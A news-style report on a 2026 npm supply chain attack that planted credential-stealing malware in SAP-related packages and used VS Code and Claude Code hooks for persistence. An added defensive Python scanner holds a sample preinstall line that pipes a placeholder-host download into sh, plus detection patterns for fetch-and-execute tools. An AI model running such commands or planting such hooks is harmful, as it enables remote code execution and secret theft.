- A supply chain attack compromised four key SAP-related npm packages with credential-stealing malware on April 29, 2026.
- The malware, self-titled mini Shai-Hulud, steals developer and cloud secrets, encrypts them, and exfiltrates data to over 1,100 GitHub repositories.
- This is one of the first attacks to target AI coding agent configurations for persistence, using hooks in VS Code and Claude Code.
- The attack was enabled by exploiting a misconfigured OIDC trusted publisher workflow in a GitHub Actions repository.
According to reports, cybersecurity researchers exposed a new supply chain attack on April 29, 2026, that compromised SAP-related npm packages with sophisticated credential-stealing malware. Dubbed mini Shai-Hulud, the campaign specifically targeted packages such as mbt and three @cap-js modules used in the SAP JavaScript development ecosystem.
The malicious versions introduced a preinstall script that downloaded and executed a payload, a detail confirmed by Socket. This payload was designed to harvest developer credentials, GitHub and npm tokens, and secrets from major cloud platforms including AWS, Azure, and GCP.
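As an added illustration (not code from the report or from the affected projects), a small scanner that flags lifecycle scripts in an installed node_modules tree which both fetch remote content and execute it, the behaviour described for the compromised versions; the heuristic patterns, the temporary sample tree and the package names in it are constructed for this example.

```python
"""Scan an installed node_modules tree for lifecycle scripts that download and run code."""
import json
import os
import re
import tempfile

# Hooks npm runs automatically during `npm install` without any user action.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Assumed heuristics for "fetch something" and "execute something"; not taken from the report.
DOWNLOAD_PATTERNS = (r"\bcurl\b", r"\bwget\b", r"\bfetch\(", r"https?://")
EXEC_PATTERNS = (r"\bnode\s+-e\b", r"\beval\(", r"\|\s*(sh|bash)\b", r"\bchild_process\b", r"\bexec\(")


def suspicious_hooks(pkg_json: dict) -> list:
    """Return (hook, script) pairs whose script both downloads and executes code."""
    found = []
    for hook in LIFECYCLE_HOOKS:
        script = pkg_json.get("scripts", {}).get(hook)
        if not script:
            continue
        downloads = any(re.search(p, script) for p in DOWNLOAD_PATTERNS)
        executes = any(re.search(p, script) for p in EXEC_PATTERNS)
        if downloads and executes:
            found.append((hook, script))
    return found


def scan_node_modules(root: str) -> dict:
    """Walk a node_modules tree and map package name -> suspicious lifecycle hooks."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                pkg = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip, do not crash the scan
        hits = suspicious_hooks(pkg)
        if hits:
            report[pkg.get("name", dirpath)] = hits
    return report


def demo_scan() -> dict:
    """Build a constructed node_modules tree (one benign, one malicious package) and scan it."""
    root = os.path.join(tempfile.mkdtemp(), "node_modules")
    samples = {  # constructed sample manifests; the URL is a placeholder
        "benign-lib": {"name": "benign-lib", "scripts": {"postinstall": "node ./build.js"}},
        "evil-constructed": {"name": "evil-constructed",
                             "scripts": {"preinstall": "curl -s https://example.invalid/p.sh | sh"}},
    }
    for name, pkg in samples.items():
        os.makedirs(os.path.join(root, name))
        with open(os.path.join(root, name, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(pkg, fh)
    return scan_node_modules(root)


if __name__ == "__main__":
    print(demo_scan())  # only the constructed malicious package should be reported
```

Point `scan_node_modules` at a real project's node_modules directory to review what `npm install` would have run; pairing this with `npm install --ignore-scripts` in CI removes the hook from the install path altogether.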
The stolen data was then encrypted with AES-256-GCM and sent to public GitHub repositories created on victim accounts. The malware also gained persistence by injecting files into repositories to trigger execution when they were opened in code editors such as VS Code.
Meanwhile, Wiz noted the attack shares features with prior TeamPCP operations, suggesting the same threat actor. The attackers compromised a developer account and exploited a critical configuration gap in npm's OIDC trusted publishing.
SafeDep explained the publisher configuration for one package trusted any workflow, not just the canonical one. This allowed a branch push to obtain a token for publishing the malicious packages without proper provenance.
In response, the maintainers and the cds-dbs team have released new, safe versions to supersede the compromised ones. StepSecurity highlighted this as a pioneering attack vector for targeting AI coding agent configurations.